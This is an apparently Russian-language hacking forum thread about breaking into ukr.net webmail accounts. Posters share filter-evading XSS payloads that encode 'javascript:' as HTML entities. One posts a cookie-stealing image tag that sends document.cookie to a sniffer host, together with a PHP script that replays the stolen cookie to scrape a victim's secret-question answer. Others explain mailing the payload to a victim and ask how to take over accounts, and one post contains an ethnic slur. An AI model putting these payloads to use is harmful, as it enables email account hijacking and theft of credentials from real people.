ukr.net как?

Discussion in 'Песочница' started by Grema, 1 Dec 2005.

  1. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    www.ukr.net

    Считываем ответ на секретный вопрос
    Code:
    <embed src=&#106&#97&#118&#97&#115&#99
    но как? и куда его пихать, расжите плиз, очень надо! =)
     
    1 person likes this.
  2. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    ВЫКЛАДЫВАЙТЕ СРАЗУ ТЕСТОВЫЕ ЛОГИН/ПАРОЛЬ!

    Регистрация нового ящика доступна только с территории Украины.

    То что ты выложил - по всей видимости кусок Xss. Почему не до конца? Конкретнее без доступа к ящику сказать трудно, а работать на диал апе через украинские прокси мне не в прикол.
     
    #2 Dronga, 2 Dec 2005
    Last edited: 2 Dec 2005
  3. NeMiNeM

    NeMiNeM Elder - Старейшина

    Joined:
    22 Aug 2005
    Messages:
    480
    Likes Received:
    310
    Reputations:
    201
    Dronga
    Логин - [email protected]
    Пароль - abcde

    Grema
    Виложы до конца код!
     
  4. Grema

    Grema Elder - Старейшина

    Joined:
    29 Nov 2005
    Messages:
    109
    Likes Received:
    16
    Reputations:
    -4
    я его отсюда взял http://antichat.ru/txt/hmail/


    полный код

    <embed src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:this.wav>
     
  5. FHT

    FHT Elder - Старейшина

    Joined:
    21 Sep 2005
    Messages:
    454
    Likes Received:
    212
    Reputations:
    168
    Дружище...Если ты его там взял то по ходу и прочитать должен был все...
    Там все доходчиво описано...
    Читай еще и еще и еще раз.
    Пока не поймешь.
     
  6. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Взлом ящика на http://www.ukr.net/

    Спасибо NeMiNeM за тестовые логин/пароль, надеюсь автор темы не забудет повысить ему репутацию.
    Теперь по делу.
    На исследования ушло ровным счетом 7 минут. Диагноз:
    Фильтр чем-то напоминает тот, что чтоит на mail.ru (ранние версии). Пропускает закодированное javascript в левых тегах. Обходящая конструкция очень стандартна. Вот рабочий пример:
    Code:
    <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert('ANTICHAT.RU');>
    (javascript в ASCII)
    В общем, полноценная активная xss в теле письма найдена.

    Половина дела есть. Теперь смотрим что используется для авторизации. Сервер дал мне куки. В настройках я увидел отключенную опцию на запрет паралельных сессий, то есть на IP сервер по умолчанию не смотрит.

    В дополнение ко всему мною были отмечены следущие особенности:
    В настройках, в некоторых интересных местах не запрашивается пароль на сохранение изменений. Выводы делайте сами. На страничке Личная информация для [email protected] секретный вопрос и ответ на него не закрыты звездочками (!), то есть ящик элементарно "угоняется".

    В общем, простор для творчества очень широкий.

    Я бы тебе всё с удовольствием расписал от и до, но к сожалению в инете у меня осталось времени 8 минут. И те я трачу на тебя.. :cool:

    Кстати, приведенный тобой код, тоже по идее должен работать (если только embed не фильтруется).

    Актуально под IE6 и Opera 8.51 (Другие не пробовал)
     
    #6 Dronga, 3 Dec 2005
    Last edited: 3 Dec 2005
    Prous, Dimi4, NeMiNeM and 1 other person like this.
  7. muse

    muse Elder - Старейшина

    Joined:
    25 Sep 2005
    Messages:
    28
    Likes Received:
    6
    Reputations:
    6
    ну а если нужно захватить канал на irc а чел в ящик незаглядует уже более года ??? что делать??
     
    1 person likes this.
  8. PinkPanther

    PinkPanther [ розовый мафиозо ]

    Joined:
    16 Mar 2005
    Messages:
    280
    Likes Received:
    75
    Reputations:
    85
    Захват ящика на ukr.net

    Гы, у мну даж стать хде-то на винте статья пылится по данной теме....Дело это было еще в начале декабря, не знаю как сейчас, может уже и парсится.
    Code:
    <img src="[url="http://privatesniff/1.gif"]http://privatesniff/1.gif"style="background:white[/url] url(&#106&#97&#118&#97&#115cript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)"> 
    PHP:
    <? 
    $query=$_SERVER["QUERY_STRING"];
    $query=urldecode($query);
    $header="GET http://e.ukr.net/cgi-bin/userinfo HTTP/1.0\r\n"
    $header.="Referer: http://e.ukr.net\r\n";
    $header.="Cookie: ".$query."\r\n";
    $header.="Host: e.ukr.net\r\n\r\n";
    $fp=fsockopen("e.ukr.net"80); 
    fwrite($fp$header); 
    $dt=""
    while (!
    feof($fp)) 
    $dt.=fread($fp1024); 
    $pass1=strpos($dt,'Password_Answer')+24
    $pass2=strpos($dt,'" size="40"><br><br></td>'); 
    $length_pass=$pass2-$pass1
    $password=substr($dt,$pass1,$length_pass); 
    $f1=Fopen("password.html","a"); 
    fwrite($f1,"$password<br /><hr>"); 
    fclose($f1); 
    fclose($fp); 
    ?>
    Так же, если при авторизации поставить галочку "Помнить пароль", то можно использовать и обічній сниффер, ибо нам в лог упадет пароль в чистом виде.
     
    4 people like this.
  9. ZiM

    ZiM New Member

    Joined:
    19 Dec 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    обясните плиз нешарящему, куда энто дело пихать?
     
  10. PSalm69

    PSalm69 [ радиоверсия ]

    Joined:
    12 Jul 2005
    Messages:
    891
    Likes Received:
    300
    Reputations:
    530
    это посылаешь на мыло в письме жертве
    Code:
    <img src="http://privatesniff/1.gif"style="background:white url(&#106&#97&#118&#97&#115cript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)"> 
    а код php сюда
    _http:// privatesniff/s.php сюда
     
    8 people like this.
  11. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Неплохо мы тут этот ukr.net разнесли) Хохлы.. В следующий раз сразу на наши условия соглашаться будут =) Хорошая тема. PinkPanther респект, но зря так выложил)
     
    1 person likes this.
  12. ZiM

    ZiM New Member

    Joined:
    19 Dec 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    как? :confused: я абсолютно нешарю, но очень хочу научится

    Code:
    <img src="http://privatesniff/1.gif"style="background:white url(&#106&#97&#118&#97&#115cript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)"> 
    то куда потом призодит отчет, на моё мло?
     
    #12 ZiM, 6 Jan 2006
    Last edited: 6 Jan 2006
  13. NeMiNeM

    NeMiNeM Elder - Старейшина

    Joined:
    22 Aug 2005
    Messages:
    480
    Likes Received:
    310
    Reputations:
    201
    ZiM: забей.
    <img src= ... "> уже не проходит.. Прикрыли.
    Нужно искать новые уязвимости...
     
  14. ZiM

    ZiM New Member

    Joined:
    19 Dec 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    жаль так хотелось мыло на нашем родном сервере хакнуть(
     
  15. NeMiNeM

    NeMiNeM Elder - Старейшина

    Joined:
    22 Aug 2005
    Messages:
    480
    Likes Received:
    310
    Reputations:
    201
    Угу, по-моему они прикрыли дыру, когда только Dronga выложил активную хсс и код алерта... Но я думаю там ещё можно покопатся и что-нибудь найти ;)
     
  16. Jonathan Allen

    Joined:
    21 Mar 2005
    Messages:
    62
    Likes Received:
    6
    Reputations:
    2
    HTML:
    <img src="http://privatesniff/1.gif"style="background:white url(&#106&#97&#118&#97&#115cript:document.images[0].src='http:// privatesniff/s.php?'+document.cookie)"> 

    Можно об этом по-подробнее? Потому, что на одном из интересующих меня операторов проходит
     
  17. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    Вот рабочая XSS:
    HTML:
    <img src=JaVaScRiPt:alert()>
    Слово JaVaScRiPt написано разным регистром
     
    #17 Майор, 7 Jan 2006
    Last edited: 7 Jan 2006
  18. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    Создайте ктонибудь почту на ukr.net

    пожалуйста....
     
  19. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    НУ ПОЖАЛУЙСТА....
     
  20. echobyte

    echobyte Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    463
    Likes Received:
    190
    Reputations:
    50
    PM